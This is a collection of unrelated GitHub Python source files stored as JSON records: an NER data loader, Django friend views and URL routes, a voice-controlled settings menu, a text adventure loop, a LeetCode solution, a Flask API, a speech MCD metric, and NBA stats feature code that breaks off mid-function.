prepare_dataset(sentences, word_to_id, char_to_id, tag_to_id, ctc_pred_dict, lower=True):\n \"\"\"\n Prepare the dataset. Return a list of lists of dictionaries containing:\n - word indexes\n - word char indexes\n - tag indexes\n \"\"\"\n def f(x): return x.lower() if lower else x\n data = []\n hands = hand_features_to_idx(sentences)\n \n for i, s in enumerate(sentences):\n str_words = [w[0] for w in s]\n words = [word_to_id[f(w) if f(w) in word_to_id else '']\n for w in str_words]\n # Skip characters that are not in the training set\n chars = [[char_to_id[c] for c in w if c in char_to_id]\n for w in str_words]\n caps = [cap_feature(w) for w in str_words]\n tags = [tag_to_id[w[-1]] for w in s]\n hand = hands[i]\n seg_pred_ids=seg_pred_to_idx(s)\n # seg_pred_ids = seg_pred_to_idx(s)\n ctc_pred_ids = ctc_pred_to_idx(s, ctc_pred_dict)\n\n \n\n data.append({\n 'str_words': str_words,\n 'words': words,\n 'chars': chars,\n 'caps': caps,\n 'tags': tags,\n 'seg_pred': seg_pred_ids, #seg pred\n 'ctc_pred':ctc_pred_ids,\n 'handcrafted': hand\n })\n return data\n\n\ndef augment_with_pretrained(dictionary, ext_emb_path, words):\n \"\"\"\n Augment the dictionary with words that have a pretrained embedding.\n If `words` is None, we add every word that has a pretrained embedding\n to the dictionary, otherwise, we only add the words that are given by\n `words` (typically the words in the development and test sets.)\n \"\"\"\n print('Loading pretrained embeddings from %s...' 
% ext_emb_path)\n assert os.path.isfile(ext_emb_path)\n\n #Load pretrained embeddings from file\n pretrained = set([\n line.rstrip().split()[0].strip()\n for line in codecs.open(ext_emb_path, 'r', 'utf-8')\n if len(ext_emb_path) > 0\n ])\n\n pretrained = []\n for line in codecs.open(ext_emb_path, 'r', 'utf-8'):\n if len(ext_emb_path) > 0:\n try:\n pretrained.append(line.rstrip().split()[0].strip())\n except IndexError:\n continue\n pretrained = set(pretrained)\n for word in words:\n if word not in dictionary and any(x in pretrained for x in [word,word.lower(),re.sub('\\d', '0', word.lower())]):\n dictionary[word] = 0 #add the word from dev & test pretrained embedding with 0 freq\n\n # We either add every word in the pretrained file,\n # or only words given in the `words` list to which\n # we can assign a pretrained embedding\n\n #JT: commented_below : as adding all words from embedding throws CUDA runtime errors\n # if words is None:\n # for word in pretrained:\n # if word not in dictionary:\n # dictionary[word] = 0 #add the word from pretrained embedding with 0 freq\n # else:\n # for word in words:\n # if any(x in pretrained for x in [\n # word,\n # word.lower(),\n # re.sub('\\d', '0', word.lower())\n # ]) and word not in dictionary:\n # dictionary[word] = 0 #add the word from pretrained embedding with 0 freq\n\n word_to_id, id_to_word = create_mapping(dictionary)\n return dictionary, word_to_id, id_to_word\n\n\ndef pad_seq(seq, max_length, PAD_token=0):\n # add pads\n seq += [PAD_token for i in range(max_length - len(seq))]\n return seq\n\ndef get_batch(start, batch_size, datas, singletons=[]):\n input_seqs = []\n target_seqs = []\n chars2_seqs = []\n\n for data in datas[start:start+batch_size]:\n # pair is chosen from pairs randomly\n words = []\n for word in data['words']:\n if word in singletons and np.random.uniform() < 0.5:\n words.append(1)\n else:\n words.append(word)\n input_seqs.append(data['words'])\n target_seqs.append(data['tags'])\n chars2_seqs.append(data['chars'])\n\n if input_seqs == []:\n return [], [], [], [], [], []\n seq_pairs = sorted(zip(input_seqs, target_seqs, chars2_seqs), key=lambda p: len(p[0]), reverse=True)\n input_seqs, target_seqs, chars2_seqs = zip(*seq_pairs)\n\n chars2_seqs_lengths = []\n chars2_seqs_padded = []\n for chars2 in chars2_seqs:\n chars2_lengths = [len(c) for c in chars2]\n chars2_padded = [pad_seq(c, max(chars2_lengths)) for c in chars2]\n chars2_seqs_padded.append(chars2_padded)\n chars2_seqs_lengths.append(chars2_lengths)\n\n input_lengths = [len(s) for s in input_seqs]\n # input_padded is batch * max_length\n input_padded = [pad_seq(s, max(input_lengths)) for s in input_seqs]\n target_lengths = [len(s) for s in target_seqs]\n assert target_lengths == input_lengths\n # target_padded is batch * max_length\n target_padded = [pad_seq(s, max(target_lengths)) for s in target_seqs]\n\n # var is max_length * batch_size\n # input_var = Variable(torch.LongTensor(input_padded)).transpose(0, 1)\n # target_var = Variable(torch.LongTensor(target_padded)).transpose(0, 1)\n #\n # if use_gpu:\n # input_var = input_var.cuda()\n # target_var = target_var.cuda()\n\n return input_padded, input_lengths, target_padded, target_lengths, chars2_seqs_padded, chars2_seqs_lengths\n\n\ndef random_batch(batch_size, train_data, singletons=[]):\n input_seqs = []\n target_seqs = []\n chars2_seqs = []\n\n\n for i in range(batch_size):\n # pair is chosen from pairs randomly\n data = random.choice(train_data)\n words = []\n for word in data['words']:\n if word in singletons 
and np.random.uniform() < 0.5:\n words.append(1)\n else:\n words.append(word)\n input_seqs.append(data['words'])\n target_seqs.append(data['tags'])\n chars2_seqs.append(data['chars'])\n\n seq_pairs = sorted(zip(input_seqs, target_seqs, chars2_seqs), key=lambda p: len(p[0]), reverse=True)\n input_seqs, target_seqs, chars2_seqs = zip(*seq_pairs)\n\n chars2_seqs_lengths = []\n chars2_seqs_padded = []\n for chars2 in chars2_seqs:\n chars2_lengths = [len(c) for c in chars2]\n chars2_padded = [pad_seq(c, max(chars2_lengths)) for c in chars2]\n chars2_seqs_padded.append(chars2_padded)\n chars2_seqs_lengths.append(chars2_lengths)\n\n input_lengths = [len(s) for s in input_seqs]\n # input_padded is batch * max_length\n input_padded = [pad_seq(s, max(input_lengths)) for s in input_seqs]\n target_lengths = [len(s) for s in target_seqs]\n assert target_lengths == input_lengths\n # target_padded is batch * max_length\n target_padded = [pad_seq(s, max(target_lengths)) for s in target_seqs]\n\n # var is max_length * batch_size\n # input_var = Variable(torch.LongTensor(input_padded)).transpose(0, 1)\n # target_var = Variable(torch.LongTensor(target_padded)).transpose(0, 1)\n #\n # if use_gpu:\n # input_var = input_var.cuda()\n # target_var = target_var.cuda()\n\n return input_padded, input_lengths, target_padded, target_lengths, chars2_seqs_padded, chars2_seqs_lengths\n","repo_name":"jeniyat/StackOverflowNER","sub_path":"code/Attentive_BiLSTM/loader_so.py","file_name":"loader_so.py","file_ext":"py","file_size_in_byte":21229,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"68"} +{"seq_id":"27062867758","text":"from django.shortcuts import render, redirect\nfrom friends.models import Friend\nfrom django.contrib.auth.models import User\n# Create your views here.\n\n\ndef change_friends(request, operation, pk):\n friend = User.objects.get(pk=pk)\n print (friend)\n if operation == 'add':\n friendship_one, created = Friend.objects.get_or_create(owner = request.user)\n friendship_one.users.add(friend)\n friendship_two, created = Friend.objects.get_or_create(owner = friend)\n friendship_two.users.add(request.user)\n\n elif operation == 'lose':\n friendship_one = Friend.objects.get(owner=request.user)\n friendship_one.users.remove(friend)\n if not friendship_one.users.exists():\n friendship_one.delete()\n friendship_two = Friend.objects.get(owner = friend)\n friendship_two.users.remove(request.user)\n if not friendship_two.users.exists():\n friendship_two.delete()\n\n return redirect('accounts:profile', pk)\n","repo_name":"naderae/BFF","sub_path":"friends/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73667297496","text":"from vowel_recognition import *\nfrom import_json import *\nfrom emergency_detection_mode import *\n\ndef change_shortcut_sounds(dictionary):\n shortcut = input(\"Which shortcut do you want to change the shortcut sound for?\")\n if shortcut in dictionary:\n print(\"Say what you want the new shortcut sound to be?\")\n new_shortcut_sound = get_user_sounds(user_made_sounds).strip()\n shortcut_sound_in_use = is_shortcut_sound_in_use(dictionary, new_shortcut_sound)\n \n if shortcut_sound_in_use == \"not in use\":\n dictionary[shortcut] = new_shortcut_sound\n save_user_changes()\n else:\n print(\"This shortcut sound is already being used for \" + shortcut_sound_in_use + \".\")\n x = input(\"Would you like to overwrite 
this? y/n?\")\n if x == \"y\": \n dictionary[shortcut_sound_in_use] = \"none\"\n dictionary[shortcut] = new_shortcut_sound\n save_user_changes()\n else:\n print(\"Shortcut sound for \" + shortcut + \" has not changed.\")\n else:\n print(\"The shortcut you entered is not available in this mode.\")\n\ndef is_shortcut_sound_in_use(dictionary, sound):\n while True:\n try:\n shortcut_sound = list(dictionary.keys())[list(dictionary.values()).index(sound)]\n print(shortcut_sound[0])\n return shortcut_sound[0]\n except ValueError:\n return \"not in use\"\n\n\ndef new_user_sound(number): \n new_sound_name = input(\"Name new sound:\")\n train_sounds(new_sound_name, number)\n\ndef change_a_shortcut_sound():\n print(\"Which mode would you like to change the shortcut for?\")\n print(settings_dict[\"a\"] + \": Keyboard mode \\n\" + settings_dict[\"b\"]+ \": Mouse mode \\n\" + settings_dict[\"c\"]+ \": Hotkey Mode \\n\" + settings_dict[\"d\"] + \": Shortcuts for modes \\n\")\n sound_string = get_user_sounds(user_made_sounds) \n print(sound_string)\n x = trigger_shortcut(sound_string, settings_dict) \n if x == \"a\": \n change_shortcut_sounds(keyboard_dict)\n print(\"Your changes have been implemented.\")\n elif x == \"b\":\n change_shortcut_sounds(mouse_dict)\n print(\"Your changes have been implemented.\")\n elif x == \"c\":\n change_shortcut_sounds(hotkey_dict)\n print(\"Your changes have been implemented.\")\n elif x == \"d\": \n change_shortcut_sounds(mode_dict) \n print(\"Your changes have been implemented.\")\n else: \n print(\"Not an option. Please enter a, b, c or d.\")\n \n\ndef settings_mode(user_made_sounds = user_made_sounds):\n print(\"Settings Mode Started.\")\n mode_on = True\n while mode_on:\n print(\"What would you like to do? \\n\" + settings_dict[\"a\"]+ \": Change a shortcut sound. \\n\" + settings_dict[\"b\"]+ \": Create a custom sound \\n\" + settings_dict[\"c\"]+ \": Train default sounds \\n\" + settings_dict[\"d\"]+ \": Other settings. \\n\" + settings_dict[\"e\"]+ \": Reset to default settings. \\n\"+ settings_dict[\"g\"]+ \": Update emergency info \\n\" + settings_dict[\"f\"]+ \": Leave settings\")\n sound_string = get_user_sounds(user_made_sounds) \n print(sound_string)\n x = trigger_shortcut(sound_string, settings_dict)\n if x == \"a\":\n change_a_shortcut_sound()\n elif x == \"b\":\n new_user_sound(4)\n elif x == \"c\": \n print(\"Do you want to \\n\" + settings_dict[\"a\"]+ \": train default sounds from scratch \\n\" + settings_dict[\"b\"]+ \": add to the existing \")\n sound_string = get_user_sounds(user_made_sounds) \n print(sound_string)\n y = trigger_shortcut(sound_string, settings_dict)\n if y ==\"a\":\n user_made_sounds = {\"is_tutorial_complete\": \"False\", \"\": \"\", \" \": \"\", \"finishkeyboardmode\": \"finishkeyboardmode\", \"finishhotkeymode\": \"finishhotkeymode\", \"ah\": \"ah\", \"ay\": \"ay\", \"ee\": \"ee\"}\n train_default_sounds(4)\n elif y == \"b\": \n train_default_sounds(4)\n else:\n print(\"Not an option. 
Please enter a or b.\")\n save_user_changes()\n elif x == \"d\":\n print(\"Change \\n\" + settings_dict[\"a\"]+ \": Threshold (How loud the sound has to be) \\n\" + settings_dict[\"b\"]+ \": Length of silence (How long the silence in mouse mode before you have to say the direction) \")\n sound_string = get_user_sounds(user_made_sounds) \n print(sound_string)\n y = trigger_shortcut(sound_string, settings_dict)\n if y == \"a\":\n print(\"The current threshold is \" + general_settings[\"threshold\"]+\".\")\n z = input(\"What would you like the new threshold to be? Suggested: between 0.075 and 0.125. Press X to cancel.\").strip()\n is_number = z.replace(\".\", \"\").isnumeric()\n if is_number:\n general_settings[\"threshold\"] = z\n elif z != \"X\" and z != \"x\":\n print(\"Please enter a number or X if you want to cancel.\")\n if y == \"b\":\n print(\"The current length of silence is \" + general_settings[\"length_of_silence\"]+\".\")\n z = input(\"What would you like the new length of silence to be? Note: must be an integer. Press X to cancel.\").strip()\n is_integer = z.isnumeric()\n if is_integer:\n general_settings[\"length_of_silence\"] = z\n elif z != \"X\" and z != \"x\":\n print(\"Please enter an integer or X if you want to cancel.\")\n elif x == \"e\":\n print(\"Are you sure you want to reset to default settings? You will lose all your trained sounds. \" + settings_dict[\"a\"]+ \": Yes \" + settings_dict[\"b\"]+ \": No\")\n sound_string = get_user_sounds(user_made_sounds) \n print(sound_string)\n y = trigger_shortcut(sound_string, settings_dict)\n if y == \"a\":\n reset_to_default() \n print(\"System has been reset to default settings.\")\n else:\n print(\"System has NOT been reset.\") \n elif x == \"f\":\n print(\"Exiting settings...\")\n save_user_changes()\n mode_on = False\n elif x == \"g\":\n set_emergency_info()\n else: \n print(\"Not an option. Please enter a, b, c, d, e or f.\")\n\n \n\n\n\n","repo_name":"pulfdev/Sound_Recognition","sub_path":"settings_mode.py","file_name":"settings_mode.py","file_ext":"py","file_size_in_byte":6372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"20028996649","text":"# Imports\nimport RichConsole as RC\nimport Map.Map as Map\nimport Player.Player as Player\nimport Data as Data\nimport ImportData as ImportData\n\n\n\ndef Main():\n Menu()\n\n\n\ndef Menu():\n # Main menu were player choose what he want to do\n Userchoose =\"\"\n while Userchoose != 'Q':\n Userchoose = input(\"\"\"\n (J)ouer\n (Q)uitter\n \n \"\"\").upper()\n\n if Userchoose == 'J':\n PlayGame()\n\n if Userchoose == 'Q':\n print(\"Au revoir\\n\")\n\ndef PlayGame():\n # check if the player entry is ok\n NameOk = False\n while NameOk == False :\n try :\n Data.PlayerName = str(input(f\"Quel est ton nom ?\\n\"))\n if len(Data.PlayerName) > 0 :\n NameOk = True\n except :\n continue\n\n print(\n \"\"\"\n Tu te réveille sur une île tropicale. 
Tu te releves et apercois un sac à dos contenant une carte,\n un chargeur solaire, un couteau et une bouteille.Une note te dis de résoudre les énigmes et d'aller\n tout d'abord voir le sphinx au Nord.\n \"\"\")\n Pause = input('presse une touche pour continuer')\n \n\n RC.ClearConsole()\n # import all files needed\n ImportData.LoadMapElementsFromFile()\n ImportData.LoadPlayerFile()\n Map.LoadMap()\n Data.PlayerData['Alive'] = True\n \n # principal loop of game \n while Data.Action != \"Q\" and Data.PlayerData['Alive']== True and Data.Victory == False :\n Map.DrawMap()\n Player.Draw()\n Player.PrintPlayerStats()\n Player.ActionOfPlayer()\n\n\n \n \n\n\ndef ChargedGame() :\n pass\n\n\nif __name__==\"__main__\":\n Main()","repo_name":"Alpharius61/Projet1","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21406927688","text":"#https://leetcode.com/problems/robot-return-to-origin/\n\nclass Solution:\n def judgeCircle(self, moves: str) -> bool:\n dictionary = {'R':1,'L':-1,'U':1,'D':-1}\n x,y=0,0\n for i in moves:\n if i == 'R' or i == 'L':\n x += dictionary[i]\n else:\n y += dictionary[i]\n if x==0 and y==0:\n return True\n else:\n return False\n\ndef stringToString(input):\n import json\n\n return json.loads(input)\n\ndef main():\n import sys\n import io\n def readlines():\n for line in io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8'):\n yield line.strip('\\n')\n\n lines = readlines()\n while True:\n try:\n line = next(lines)\n moves = stringToString(line);\n \n ret = Solution().judgeCircle(moves)\n\n out = (ret);\n print(out)\n except StopIteration:\n break\n\nif __name__ == '__main__':\n main()\n","repo_name":"mitsuk-maksim/tg_mpei_course","sub_path":"657. Robot Return to Origin.py","file_name":"657. 
Robot Return to Origin.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"37682016792","text":"class Solution:\n @cache\n def dp(self, num):\n if num == 1:\n return 0\n\n if num % 2:\n return 1 + self.dp(num * 3 + 1)\n return 1 + self.dp(num // 2)\n \n \n def quickselect(self, left, right, nums, k):\n pivot, pointer = nums[right], left\n \n for idx in range(left, right):\n if nums[idx] <= pivot:\n nums[pointer], nums[idx] = nums[idx], nums[pointer]\n pointer += 1\n \n \n nums[pointer], nums[right] = nums[right], nums[pointer]\n \n if pointer > k:\n return self.quickselect(left, pointer - 1, nums, k)\n if pointer < k:\n return self.quickselect(pointer + 1, right, nums, k)\n \n return nums[pointer][1]\n \n \n def getKth(self, lo: int, hi: int, k: int) -> int:\n \"\"\"\n bruteforce is a dp approach by saving\n \n for idx in range(12, 15):\n dp(idx)\n \n dp(idx)\n if idx == 1:\n return 0\n \n if even, and if odd\n return\n \n \n sort the nums based on their values\n return nums[k - 1]\n \"\"\"\n nums = []\n for num in range(lo, hi + 1):\n nums.append([self.dp(num), num])\n \n \n return self.quickselect(0, len(nums) - 1, nums, k - 1)\n","repo_name":"Henok-Matheas/competitive_programming","sub_path":"1387-sort-integers-by-the-power-value/1387-sort-integers-by-the-power-value.py","file_name":"1387-sort-integers-by-the-power-value.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"23260544815","text":"#!/usr/bin/python3\n#input functions take input from keyboard,with the string in bracket printed when input function is run.\nname = input('what is your name you beautiful thang? ')\nage = input('what is your age? ')\n#print functions prints everything like a string\n#{age:d} will cast age as the integer it is and not string. x=hex,b=binary,s=string\nprint(f'hello, {name} you are {age} year old')\n\nstr1 = 'welcome' #to assign string, or print a string always put in parenthesis\nstr2 = 'to my program'\nwelcome = str1 + \" \" + str2 + \" \" + 3 * \"Hurray! \" #strings can be concated like this\nprint(welcome)\n\nlove = \"\"\"\nI love you so much\nplease marry me\nWe will live forever happy together\n\"\"\"\n\nprint(name, '!' 
, 'you are so pretty', love)","repo_name":"chesahkalu/random_python_basics","sub_path":"Beginer_basics/1-yourname.py","file_name":"1-yourname.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72451359258","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 28 16:28:58 2020\n\n@author: Gunna\n\"\"\"\n\nimport os\nimport xmltodict\n\n#################### Path Declaration ####################\nhomePath = os.path.join( os.getcwd( )[ : os.getcwd( ).find( \"Programming\") ], \"Programming\" )\ntrainPath = os.path.join( homePath, \"training\" )\nprepPath = os.path.join( homePath, \"prep\" )\npngPath = os.path.join( homePath, \"pngData/test/\" )\npackagePath = os.path.join( homePath, \"packages\" )\ntempPath = os.path.join( homePath, \"temp\" )\n##########################################################\n\n\npath = os.path.join( prepPath, \"labeled\" )\n\nxmlFiles = os.listdir( path )\n\nlabelList = []\n\nfor file in xmlFiles:\n \n with open( os.path.join( path, file ) ) as f:\n doc = xmltodict.parse( f.read( ) )\n \n imName = doc[ \"annotation\" ][ \"filename\" ]\n imPath = doc[ \"annotation\" ][ \"path\" ]\n bndBox = doc[ \"annotation\" ][ \"object\" ][ \"bndbox\" ]\n name = doc[ \"annotation\" ][ \"object\" ][ \"name\" ]\n xmin = int( bndBox[ \"xmin\" ] )\n xmax = int( bndBox[ \"xmax\" ] )\n ymin = int( bndBox[ \"ymin\" ] )\n ymax = int( bndBox[ \"ymax\" ] )\n \n labelList.append( [ imPath, imName, xmin, ymin, xmax, ymax ] )\n\ncsvString = \"Bild Pfad;Bild Name;xMin;yMin;xMax;yMax\\n\"\n\nfor entry in labelList:\n csvString += f\"{entry[ 0 ]};{entry[ 1 ]};{entry[ 2 ]};{entry[ 3 ]};{entry[ 4 ]};{entry[ 5 ]}\\n\"\n \nwith open( os.path.join( prepPath, \"labelList.csv\" ), \"w+\" ) as f:\n f.write( csvString )","repo_name":"gufu1995/diplom_software","sub_path":"prep/backup/labelCheck.py","file_name":"labelCheck.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"42121283390","text":"from user_profile.models import UserProfile\nfrom django import forms\nfrom django.contrib.auth import get_user_model\n\nUser = get_user_model()\nACCOUNT_CHOICE=[\n ('business','Business'),\n ('marketer','Marketer'),\n ('individual','Individual'),\n]\n\nclass UserProfileModelForm(forms.ModelForm):\n class Meta:\n model = UserProfile\n fields = ('image', 'rc_number', 'company_name', 'website')\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in iter(self.fields):\n self.fields[field].widget.attrs.update({\n 'class': 'form-control'\n })\n\nclass PersonalProfileModelForm(forms.ModelForm):\n class Meta:\n model = UserProfile\n fields = ('image', 'name', 'surname', 'middle_name', 'phone_number')\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in iter(self.fields):\n self.fields[field].widget.attrs.update({\n 'class': 'form-control'\n })\n\n\n\n","repo_name":"sesdave/sugos","sub_path":"user_profile/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28798552664","text":"import os\nfrom flask import Flask, jsonify\nfrom flask_restful import Resource, Api\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napi = Api(app)\n\napp_settings = 
os.getenv('APP_SETTINGS')\napp.config.from_object(app_settings)\n\ndb = SQLAlchemy(app)\n\nclass User(db.Model): # new\n __tablename__ = 'users'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n username = db.Column(db.String(128), nullable=False)\n email = db.Column(db.String(128), nullable=False)\n active = db.Column(db.Boolean(), default=True, nullable=False)\n\n def __init__(self, username, email):\n self.username = username\n self.email = email\n\nclass UsersResource(Resource):\n def get(self):\n return {\n 'status': 'success',\n 'message': 'success msg'\n }\n\napi.add_resource(UsersResource, '/users/test')\n","repo_name":"bwdmonkey/FreeEyeOutFront","sub_path":"services/users/project/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"8857383663","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 21 11:20:19 2019\n\n@author: dongdong\n\"\"\"\nfrom django.urls import path,re_path\nfrom . import views\n\napp_name = 'article' # 一定要写这一行,否则html中会报错 'article' is not a registered namespace\n\nurlpatterns = [\n path('myalgo-column/', views.myalgo_column, name=\"myalgo_column\"),\n \n #path('myalgo-opt-detail/', views.myalgo_opt_detail, name=\"myalgo_opt_detail\"),\n path('myalgo-list-to-edit/', views.myalgo_list_to_edit, name=\"myalgo_list_to_edit\"),\n path('myalgo-post/', views.myalgo_post, name=\"myalgo_post\"),\n path('myalgoopt-post/', views.myalgoopt_post, name=\"myalgoopt_post\"),\n path('myalgo-list/', views.myalgo_list, name=\"myalgo_list\"),\n re_path('myalgo-detail/(?P\\d+)/(?P[-\\w]+)/$', views.myalgo_detail, name=\"myalgo_detail\"),\n path('myalgo-opt/', views.myalgoopt_list, name=\"myalgoopt_list\"),\n\n path('del-myalgoopt/', views.del_myalgoopt, name=\"del_myalgoopt\"), \n path('del-myalgo/', views.del_myalgo, name=\"del_myalgo\"), \n path('redit-myalgo//', views.redit_myalgo, name=\"redit_myalgo\"), \n path('redit-myalgoopt//', views.redit_myalgoopt, name=\"redit_myalgoopt\"), \n re_path('myalgo-opt-detail/(?P\\d+)/(?P[-\\w]+)/$', views.myalgo_opt_detail, name=\"myalgo_opt_detail\"),\n path('run_test//', views.run_test, name=\"run_test\"),\n path('run_algo_opt//', views.run_algo_opt, name=\"run_algo_opt\"),\n]","repo_name":"dongdong12311/cnic_portfolio","sub_path":"lehehe/article/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35058631898","text":"#-*- coding: utf-8 -*-\n\nfrom tqdm import tqdm\nimport soundfile as sf\nimport numpy as np\nimport pysptk\nimport pyworld\nfrom nnmnkwii.preprocessing.alignment import DTWAligner\nimport nnmnkwii.metrics\n\naligner = DTWAligner()\n\ndef get_mc(wav):\n y, sr = sf.read(wav)\n y = y.astype(np.float64)\n f0, timeaxis = pyworld.dio(y, sr, frame_period=5)\n f0 = pyworld.stonemask(y, f0, timeaxis, sr)\n spectrogram = pyworld.cheaptrick(y, f0, timeaxis, sr)\n mc = pysptk.sp2mc(spectrogram, order=24, alpha=0.41)\n mc = mc.astype(np.float32)\n\n return mc\n\n\ndef get_mcd(inp, ref):\n # extract mc\n inp_mc = get_mc(inp)\n ref_mc = get_mc(ref)\n\n # alignment\n inp = np.expand_dims(inp_mc, 0) # rank=3\n ref = np.expand_dims(ref_mc, 0) # rank=3\n\n inp_aligned, ref_aligned = aligner.transform((inp, ref))\n\n inp_aligned = np.squeeze(inp_aligned)\n ref_aligned = np.squeeze(ref_aligned)\n\n # calc mcd\n mcd = 
nnmnkwii.metrics.melcd(inp_aligned, ref_aligned)\n\n return mcd\n\n\nif __name__ == \"__main__\":\n def run(token_type):\n mcd_li = []\n for i in tqdm(range(1, 101)):\n inp = 'samples/{}/{}.wav'.format(token_type, i)\n ref = '/data/public/rw/jss/jss/{}.wav'.format(9900-1+i)\n mcd = get_mcd(inp, ref)\n mcd_li.append(mcd)\n mcd_li = np.array(mcd_li)\n print('{}'.format(token_type))\n print('mean =', mcd_li.mean())\n print('var =', mcd_li.var())\n\n # run(\"char\")\n # run(\"j\")\n # run(\"hcj\")\n # run(\"shcj\")\n run(\"sj\")","repo_name":"kakaobrain/jejueo","sub_path":"speech/mcd.py","file_name":"mcd.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"68"} +{"seq_id":"20336482411","text":"import pandas as pd\nimport numpy as np\nfrom common_functions.utils import DataObject\nfrom multiprocessing import get_context\nenv = 'linux'\n#%%\nif env == 'mac':\n root_data_dir = '/Users/danny/nba_bets/data/'\nelif env == 'linux':\n root_data_dir = '/home/danny/nba/data/'\n\n\ndef getTeamStats(abv, latestdate):\n # edit this function for additional feature eng\n team_subset = df1[df1['TEAM_ABBREVIATION'] == abv].copy()\n team_subset['GAME_DATE'] = pd.to_datetime(team_subset['GAME_DATE'])\n team_subset.index = team_subset['GAME_DATE']\n team_subset.sort_index(inplace=True, ascending=False)\n colnames = team_subset.columns\n stats_columns = ['PTS', 'FGM', 'FGA', 'FG_PCT',\n 'FG3M', 'FG3A', 'FG3_PCT', 'FTM', 'FTA', 'FT_PCT', 'OREB', 'DREB',\n 'REB', 'AST', 'STL', 'BLK', 'TOV', 'PF']\n date_subset = team_subset[team_subset['GAME_DATE'] < latestdate].copy()\n date_subset['numerical_wins'] = np.where(date_subset['WL'] == 'L', 0, 1)\n date_subset['location'] = np.where(date_subset['MATCHUP'].str.contains('@'), -1, 1)\n date_reversed = date_subset.iloc[::-1].copy()\n date_reversed['window_sum10'] = date_reversed['numerical_wins'].rolling(10).sum()\n date_reversed['window_sum5'] = date_reversed['numerical_wins'].rolling(5).sum()\n date_reversed['window_sum3'] = date_reversed['numerical_wins'].rolling(3).sum()\n stats_columns.extend(['window_sum10', 'window_sum5', 'window_sum3', 'location', 'numerical_wins', 'break_days'])\n date_subset = date_reversed.copy()\n date_subset['LAG_DATA'] = date_subset['GAME_DATE'].shift(1)\n date_subset['break_days'] = date_subset[\"GAME_DATE\"] - date_subset[\"LAG_DATA\"]\n date_subset['break_days'] = date_subset['break_days'].dt.days\n current_stats = date_subset.iloc[-11:, [date_subset.columns.get_loc(c) for c in stats_columns]].copy()\n base_points = current_stats['PTS']\n current_stats['PIE'] = (\n current_stats['PTS'] + current_stats['FGM'] + current_stats['FTM'] - current_stats[\n 'FTA'] + current_stats['DREB'] +\n current_stats['OREB'] + current_stats['AST'] + current_stats['STL'] + current_stats[\n 'BLK'] - current_stats['PF'] - current_stats['TOV'])\n current_stats['CORE_PTS'] = base_points\n current_stats.iloc[:, 0:18] = current_stats.iloc[:, 0:18].ewm(halflife=7).mean()\n return current_stats\n\n\ndef getTeamStatsold(abv,latestdate):\n #edit this function for additional feature eng\n team_subset = df1[df1['TEAM_ABBREVIATION'] == abv].copy()\n # team_subset = df1[df1['TEAM_ABBREVIATION'] == 'ATL'].copy()\n # latestdate = '2000-01-19'\n team_subset['GAME_DATE'] = pd.to_datetime(team_subset['GAME_DATE'])\n team_subset.index = team_subset['GAME_DATE']\n team_subset.sort_index(inplace=True, ascending=False)\n colnames = team_subset.columns\n stats_columns = ['PTS', 'FGM', 'FGA', 
'FG_PCT',\n 'FG3M', 'FG3A', 'FG3_PCT', 'FTM', 'FTA', 'FT_PCT', 'OREB', 'DREB',\n 'REB', 'AST', 'STL', 'BLK', 'TOV', 'PF']\n date_subset = team_subset[team_subset['GAME_DATE'] < latestdate].copy()\n date_subset['numerical_wins'] = np.where(date_subset['WL'] == 'L', 0, 1)\n date_subset['location'] = np.where(date_subset['MATCHUP'].str.contains('@'),-1,1)\n date_reversed = date_subset.iloc[::-1].copy()\n date_reversed['window_sum10'] = date_reversed['numerical_wins'].rolling(10).sum()\n date_reversed['window_sum5'] = date_reversed['numerical_wins'].rolling(5).sum()\n date_reversed['window_sum3'] = date_reversed['numerical_wins'].rolling(3).sum()\n stats_columns.extend(['window_sum10', 'window_sum5', 'window_sum3','location','numerical_wins'])\n date_subset = date_reversed.copy()\n\n current_stats = date_subset.iloc[-11:, [date_subset.columns.get_loc(c) for c in stats_columns]].copy()\n base_points = current_stats['PTS']\n current_stats['PIE'] = (\n current_stats['PTS'] + current_stats['FGM'] + current_stats['FTM'] - current_stats[\n 'FTA'] + current_stats['DREB'] +\n current_stats['OREB'] + current_stats['AST'] + current_stats['STL'] + current_stats[\n 'BLK'] - current_stats['PF'] - current_stats['TOV'])\n current_stats['CORE_PTS'] = base_points\n current_stats.iloc[:,0:18] = current_stats.iloc[:,0:18].ewm(halflife=7).mean()\n return current_stats\n\ndef getOverUnder(gameid):\n try:\n target_game = 